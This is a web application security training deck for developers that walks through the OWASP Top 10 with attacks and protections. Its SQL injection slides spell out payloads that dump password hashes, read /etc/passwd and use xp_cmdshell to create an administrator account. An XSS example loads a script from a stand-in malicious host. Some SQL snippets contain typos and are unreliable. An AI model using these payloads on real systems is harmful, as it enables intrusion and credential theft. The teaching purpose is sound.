The document discusses various topics related to web application security including common vulnerabilities like SQL injection, cross-site scripting, and insecure direct object references. It provides examples of how these vulnerabilities can be exploited and recommendations for proper input validation, output encoding, access control and other measures to help protect against attacks.

1. WebApplication Security
For Web Developers

2. Learning Agenda
• Cyber Crime & Security
• Web Architecture
• OWASPTop 10Vulnerabilities
• Protection

3. Information,Technology & Society
• The Information is the data that is of interest
• The Technology used to create, communicate, distribute, manipulate, store
or destroy information
• The technology is any mechanism capable of data processing
• The Society is a group of people involved in social interaction
• Becoming socialized means learning what kind(s) of behavior is appropriate
in given situation
• Society and IT and co-evolving and impact each other

4. Trends in Digitization
• Storing social and intellectual interactions
• Gathering and synthesizing information that was disconnected
• Higher expectations from technology than people

5. Cyber Crime
• Cyber crimes can involve criminal activities
that are traditional in nature, such as theft,
fraud, forgery, defamation and mischief, all
of which are subject to the Indian Penal
Code/US Federal Law
• The abuse of computers has also given birth
to a gamut of new age crimes that are
addressed by Laws

6. Types of Cyber Crime
• Hacking (illegal intrusion into a system/network)
• Denial of Service attack
• Virus dissemination
• CyberTerrorism
• Software piracy

7. Purpose of Cyber Crime
• Financial Fraud
• Damage to data/system/network
• Theft of proprietary information
• System penetration
• Denial of Service
• Unauthorized access
• Abuse of privileges
• Spreading viruses

8. What is Cyber Security?
• Cybersecurity is a subset of information
security; the practice of defending
data/information (electronic or physical)
from unauthorized access, use, disclosure,
disruption, modification, perusal,
inspection, recording or destruction
• Shared responsibility between merchants
and users
• Cyber security involves protecting that
information by preventing, detecting, and
responding to attacks.
Source: https://en.wikipedia.org/wiki/Information_security

9. What is Cyber Security?
• Cyber Security are the processes employed to
safeguard and secure assets used to carry
information of an organization from being
stolen or attacked.
• It requires extensive knowledge of the possible
threats such asVirus or such other malicious
objects.
• Identity management, risk management and
incident management form the crux of cyber
security strategies of an organization.

10. Goals of Cyber Security
• Confidentiality
• Making sure that we keep our data and our information private from those who do not
“need to know”
• Integrity
• Making sure that our data is not tampered with, so that any information we send or
receive is accurate and truthful
• Availability
• Making sure that we, our clients and anyone else who needs to get to our data is able
to easily and securely access it

11. Why Cyber SecurityTraining?
• Business Continuity &Trust factor
• Protection of data and systems
• Prevention of unauthorized access
• Safeguarding Personally Identifiable Information
• Reduces security related risks upto 75%

12. Map

13. Popular Hacks
• Burger KingTwitter account (2013)
• Twitter defaced by Iranian CyberArmy (2009)
• ESPN site decorated with cute unicorns (2009)
• Sony pictures data breach(2011), sql injection compromised passwords
• EBay data breach (2014)
• Many site defacements

14. Cost of a Breach

15. Sources of Attacks
• Virus /Worms / *-wares (Executables)
• Social Engineering (Phishing)
• Hackers who are very patient
• PEOPLE !!

16. Why web application security?
• 75% of attacks target Application layer through internet (Gartner)
• 95% of web applications have some sort of vulnerability (Imperva)
• 78% of easily exploitable weakness occur in web applications(Symantec)
• 67% of websites, used to distribute malware, are legitimate, compromised
websites (Symantec)

17. Revision of web architecture
• Setup
• Firewall
• Load balancer
• Webserver (Reverse Proxy)
• Application (.NET, Java, PHP, Perl)
• Database (SQL Server, Oracle, MySQL)

18. Revision of web architecture
• Development
• Model
• View
• Controller
• Application Anatomy
• HTML and JavaScript
• CRUD Operations
• External/internal libraries/components

19. Revision of web architecture
• Request Methods
• GET, POST, HEAD, PUT,TRACE, OPTIONS, DELETE
• HTTP & HTTPS
• FTP, SFTP
• SSH

20. WAPT
• Web Application PenetrationTesting
• Evaluate computer/server and network security
• Identify flaws and vulnerabilities
• Design or implementation flaw
• Attack possibility
• SQL Injection, CSRF, XSS, File inclusion, User enumeration
• Uses negative test data

21. OpenWeb Application Security Project
• Non profit organization and Open Community
• Purpose: Be the thriving global community that drives visibility and
evolution in the safety and security of the world’s software.
• Website - https://www.owasp.org

22. OWASP Projects
• Enterprise Security API (ESAPI)
• Collection of all the security methods that a developer needs to build a secure web
application
• Zed Attack Proxy (ZAP)
• Easy to use integrated penetration testing tool for finding vulnerabilities in web
applications
• Security Shepherd
• CBT application for web and mobile application security awareness and education
• Development Guide
• Massive document covering all aspects of web application and web service security

23. OWASP 2013Top 10 List
• A1-Injection
• A2-BrokenAuthentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Insecure Direct Object References
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Missing Function LevelAccess Control
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with KnownVulnerabilities
• A10-Unvalidated Redirects and Forwards
• (Additional) A6/2007: Information Leakage and improper Error handling
https://www.owasp.org/index.php/Top_10_2013-Top_10

24. CWE/SANSTop 25
Rank Name
[1] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[2] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[5] Missing Authentication for Critical Function
[6] Missing Authorization
[7] Use of Hard-coded Credentials
[8] Missing Encryption of Sensitive Data
[9] Unrestricted Upload of File with Dangerous Type
[10] Reliance on Untrusted Inputs in a Security Decision
[11] Execution with Unnecessary Privileges
[12] Cross-Site Request Forgery (CSRF)

25. CWE/SANSTop 25
Rank Name
[13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[14] Download of Code Without Integrity Check
[15] Incorrect Authorization
[16] Inclusion of Functionality from Untrusted Control Sphere
[17] Incorrect Permission Assignment for Critical Resource
[18] Use of Potentially Dangerous Function
[19] Use of a Broken or Risky Cryptographic Algorithm
[20] Incorrect Calculation of Buffer Size
[21] Improper Restriction of Excessive Authentication Attempts
[22] URL Redirection to Untrusted Site ('Open Redirect')
[23] Uncontrolled Format String
[24] Integer Overflow or Wraparound
[25] Use of a One-Way Hash without a Salt

26. Primary Protection
• 4 basic rules for all visible pages
• Authentication
• Authorization
• Validation
• Sanitization
• Common approach with exception handling
• Disable or limit detailed error messages
• Ensure that secure paths return similar or identical error messages
• Create a default error handler which sanitizes error messages
• IDS and IPS
• Don’t be lazy to check "ALL” !!

27. Example: Failed login message
• Compare this message
• Notice: Username does not exist
• Notice: Password was not correct
• With this
• Notice: Invalid credentials

28. A1: SQL Injection attack
• Use special characters to check
• Quotes, double quotes, slashes, dashes, HTML tags
• Modern attack techniques are automated
• Blind condition SQLi
• Information gathering
• Error based analysis
• Output mechanism
• Understanding the query
• Determine the database type
• Find out user access level
• Determine the OS

29. A1: SQL Injection attack

30. A1: SQL Injection attack

31. A1: SQL Injection attack
• Finding user privilege level
• ‘ and 1 in (select user) –-
• ‘; if user =‘dbo’ wait for delay ‘0:0:5’ –
• ‘ union select if( user() like ‘root@%’
• Default admin accounts
• sa, system, sys, dba, admin, root and many others

32. A1: SQL Injection attack
• All tables and columns in one query
• ‘ union select 0, sysobjects.name + ‘:’ +syscolumns.name + ‘: ‘ + systypes,name, 1, 1,‘1’.
1, 1, 1, 1, 1 from sysobjects, syscolumns,systypes where sysobjects.xtype = ‘U’
ANDsysobjects.id = syscolumns,idANDSyscolumns.xtype = systypes.xtype –
• File location of databases
• ‘ and 1 in (select min(filename) from master.dbo.sysdatabases where filename >’.’) –-
• Getting user names and passwords
• ‘; begin declare @var varchar(8000) set @var=‘:’ select @var=@var+’
’+login+’/’+password+’ ‘ from users where login>@var select @var as var into temp end
--

33. A1: SQL Injection attack
• The hashes are extracted using
• SELECT password FROM master..sysxlogins
• Then hex each hash
• Begin @charvalue=‘0x’, @i=1,
@length=datalength(@binvalue),
@hexstring = ‘0123456789ABCDEF’
While (@i<=@lenght) BEGIN
declare @tempint int, @firstint int, @secondint int
select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i1))
select @firstint=FLOOR(@tempint/16)
select @secondint=@tempint – (@firstint*16)
select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING
(@hexstring, @secondint+1, 1) Select @i=@i+1
END
• And then we just cycle through all passwords

34. A1: SQL Injection attack
‘; begin declare @ var varchar(8000), @xdate1 datetime, @binvalue varbinary(255),
@charvalue varchar(255), @ int, @length int, @hexstring char(16) set @var=‘:’ select
@xdate1=(select min(xdate1) from master.dbo.syslogins where password is not null) begin
while @xdate1 <= (select max (xdate1) from master.dbo.sysxlogins where password is not
null) begin select @binvalue=(select password from master.dbo.sysxlogins where
Xdate1=@xdate1), @charvalue = ‘0x’, @i=1 @length=datalength( @binvalue), @hextring
=‘0123456789ABCDEF’ while (@i<=@length) begin declare @tempint int, @firstint int,
@secondint int select @tempint=CONVERT(int, SUBSTRING( @binvalue,@i,1)) select
@firstint=FLOOR(@tempint/16) select @secondint=@tempint - ( @firstint*16) select
@charvalue=@charvalue + SUBSTRING ( @hextring,@firstint+1,1) + SUBSTRING (
@hexstring, @secondint+1,1) select @i=@i+1 end select @var=@var+’/
‘+name+’/’+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1
= (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@sdate1 and
password is not null) end select @var as x into temp end end --

35. A1: SQL Injection attack
• Brute forcing passwords
• create table tempdb..passwords( pwd varchar(255) )
• bulk insert tempdb..passwords from ‘c:/temp/passwords.txt’
• select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare(
pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where
(pwdcompare(name, sysxlogins.password, 0 ) = 1) union select sysxlogins,name, null
from sysxlogins join syslogins on sysxlogins.sid= where sysxlogins.password is null and
syslogins.isntgroup=0and syslogins.isntuser=0
• drop table tempdb..passwords

36. A1: SQL Injection attack
• Uploading files (lengthy sql query)
• ‘declare @hex varchar(8000), bin varchar(8000) select @hex = ‘4d5a900003000... 8000 hex
chars ...0000000000000000000’
exec master..sp_hex2bin @hex, @bin output ;
insert master..pwdump2
select @bin --
• Inject binary as hex in 4000 byte chunks

37. A1: SQL Injection attack
• MySQL OS Interaction
• LOAD_FILE
‘union select 1,load_file(‘/etc/passwd’),1,1,1;
• LOAD DATA INFILE
create table temp( line blob);
load date infile ‘/passwd’ into table temp;
select * from temp;
• SELECT INTO OUTFILE
• Server name and configuration
• ‘ and 1 in (select @@servername ) –
• ‘and 1 in (select srvname from master..sysservers )

38. A1: SQL Injection attack
• Linux OS based MySQL
• ‘ union select 1, (load_file(‘/etc/passwd’)),1,1,1;
• MS SQLWindows Password Creation
• ‘ exec xp_cmdshell ‘net user /add victor Pass123’—
‘;exec xp_cmdshell ‘net localgroup /add administrators victor’ –
• Stopping OS Services
• ‘; exec master..xp_servicecontrol ‘ start’, FTP Publishing’ --

39. A1: SQL Injection - Protection
• Escape special characters
• Validate input data types
• Avoid plain string concatenation
• Use prepared statements
• Enforce least privileges for application's database user
• PerformWhitelist input validation on all input
• Allow only the data that is of expected length

40. A2: Broken Authentication
• Exposure of SESSION ID
• Considering SESSION ID's data acceptable
• Pages without authorization checks
• Not confirming user actions
• Not HTTPS? Beware !!

41. A2: Broken Authentication - Protection
• Centralized & standardized authentication
• Use standard session ID of your container
• Protect credentials and Session ID with SSL/TLS
• Keep your SSL certificate safe
• Automatically logout inactive sessions
• Use supplemental authentications (OTP, Captchas, etc)
• Expire/remind old passwords and have strong password policy
https://howsecureismypassword.net/

42. A3: Cross Site Scripting (XSS)
• Code in text field
• "Every" web application has this problem
• By-passed client side validations
• Two types
• Reflected XSS
• Stored XSS

43. A3: Cross Site Scripting (XSS)
• Query:
• http://vulnerable.com/search/my+search
• Result:
...<body>
<p>Search results for <strong>my search</strong></p>
...
• Query:
• http://vulnerable.com/search/<script src=http://malicious.com/script.js></script>
• Result:
...
<p>Search results from <strong><script src=http://malicious.com/script.js></script></p>
...

44. A3: Cross Site Scripting (XSS)
• If an attacker submits a comment
• <script>alert(‘HelloVictim!’);</script>
• The result may look like
• <div class=comments>
<div>This post is awesome!</div>
<div><script>alert(‘HelloVictim!’);</script></div>
• Embedded binaries are possible
• data:’text/html;base64,PHNjcmlwdD5hbGVydCgiS·
GkgdGhlcmUgOlAiKTs8L3NjcmlwdD4=

45. A3: Cross Site Scripting (XSS) - Protection
• Don’t include input in your output “as it is”
• Perform whitelist input validation
• Escape special characters
• Use Sanitizer (consider OWASP HTML Sanitizer)

46. A4: Insecure Direct Object Reference
• Failure to restrict URL access
• Hiding object references in hidden fields
• Giving access control to presentation layer
• Exposing unauthorized files/data
• E.g. https://accounts.mycompany.com/download?file=payslips/payslip_112233.pdf

47. A4: Insecure Direct Object Reference - Protection
• Verify parameter value format
• Eliminate Direct Object references
• Use Access reference maps
• E.g. https://accounts.mycompany.com/download?file=K62a8129
• Verify user authorization to access target object
• Verify requested mode on the target object (read, write, delete, etc)

48. A5: Security Misconfiguration
• Is your source code really secret?
• Is your database access restricted?
• Is your server hardened?

49. A5: Security Misconfiguration
• Missing OS/Server
patches
• Flaws in non-
upgraded application
patches
• Unauthorized access
to functionality/data
• Insider threat

50. A5: Security Misconfiguration - Protection
• Verify systems’ configuration management
• "Hardening" is done?
• Update/upgrade dependent software libraries
• Deactivate unnecessary ports, services, accounts, sites, etc.
• Scan regularly

51. A6: Sensitive Data Exposure
• Failure to identify source and destination of sensitive data
• Attackers extract secrets to use in additional attacks
• Impact on cleaning up the incident
• Storing plain passwords in code
• Usage of weak algorithms : MD5, SHA-1, RC3, RC4

52. A6: Sensitive Data Exposure - Protection
• Identify all sensitive data and their locations
• Use AES, RSA, SHA-256
• Generate, distribute and protect keys and change them often
• Verify your implementation !!
• Be careful with unknown networks: Hotspots, FreeWIFI zones, Internet
cafes, etc.

53. A7: Missing Function level action control
• Attackers invoke actions they are not authorized for
• Performing privileged actions

54. A7: Missing Function level action control -
Protection
• Restrict access to authenticated users
• Enforce user or role based permissions
• Disallow requests to unauthorized page types: config, log, source files, etc.

55. A8: Cross Site Request Forgery
• Tricking browser to load vulnerable URL
• Browsers include authentication data in each request
• Impact: Access sensitive data and change account details
• Sites relying only on credentials are vulnerable
• XSS plays well with CSRF

56. A8: Cross Site Request Forgery - Protection
• Use CSRFTokens
• Store token in session and validate the posted token
• Implement XSS protection

57. A9: Using known vulnerable components
• Attackers identify weak component and customize attack
• Libraries/framework components which are not trusted

58. A9: Using known vulnerable components - Protection
• Identify components, versions and dependencies
• Monitor the activity of these components
• Update them regularly
• Restrict use of unapproved components

59. A10: Unvalidated redirects and forwards
• Common usage of URL redirects attaching input data
• Forwarding with parameters skipping authentication

60. A10: Unvalidated redirects and forwards - Protection
• Avoid using redirects
• Don’t involve user parameters to define target URL
• Whitelist parameter types and destination URLs
• Verify access of the user before forwarding
• Check user access on all pages

61. Secure Software Development Lifecycle
• Consider security aspects when designing solution
• Understand common vulnerabilities
• Write clean code
• Perform code security scans & code reviews
• Never trust any user input !!
• Perform penetration test

62. OWASP Zed Attack Proxy
• Open source blackbox security scanner
• Free and Easy to use
• Ideal for beginners and professionals
• Cross platform (Java)
• Intended for developers

63. ZAP features
• Intercepting proxy
• Active and Passive scanners
• Spiders (for HTML and Ajax)
• Report generation
• Brute force
• Session Awareness
• API (clients exist for Java, Python, Node.js, PHP)

64. WAPT Softwares
• Web proxy
• BURP
• Paros
• Webscarab
• Fuzzing
• WS Fuzzer
• Scanners
• W3AF
• Zap

65. Best Practices
• Embed security measures while coding
• Filter and sanitize input data
• Encrypt sensitive files
• Report any potential breach
• Never let someone have access to your system with your credentials
• Always logoff or lock your system if you leave (even for a minute)

66. Conclusion
• Web applications are always under attack
• Protect your company information, assets & your information
• New threats will emerge with technology advancements
• Get Informed & Get Involved
• Trust your instincts: If something feels wrong, it is. Report the issues and ask
for help if necessary
• Be an advocate for security … speak up!

67. Glossary
• Access Point
• Asset
• Adware
• Algorithm
• Attack
• Availability
• Authentication
• Authorization
• Backdoor
• Botnet
• Brute force Attack
• Cryptography
• Cyberwar
• Compliance
• Data Leakage
• DoS, DDoS
• Digital Certificate
• Encyption
• Evidence
• Exploit
• Firewall
• Forensics
• Freeware
• Governance
• Hardening
• Hijack
• HTTP/HTTPS
• Identity
• Incident
• Intrusion (IDS&IPS)
• MAC address

68. Glossary
• Password
• Penetration
• Phishing
• Port
• Protocol
• Proxy Server
• Reverse Engineering
• Routers
• Scan
• Security Plan
• Signature
• Spam
• Spoof
• Script Injection
• Tamper
• Threat
• Trojan Horse
• User
• URI & URL
• Virus
• Virtual Private
Network
• Web Server
• Zero-dayAttack
• Zombie Computer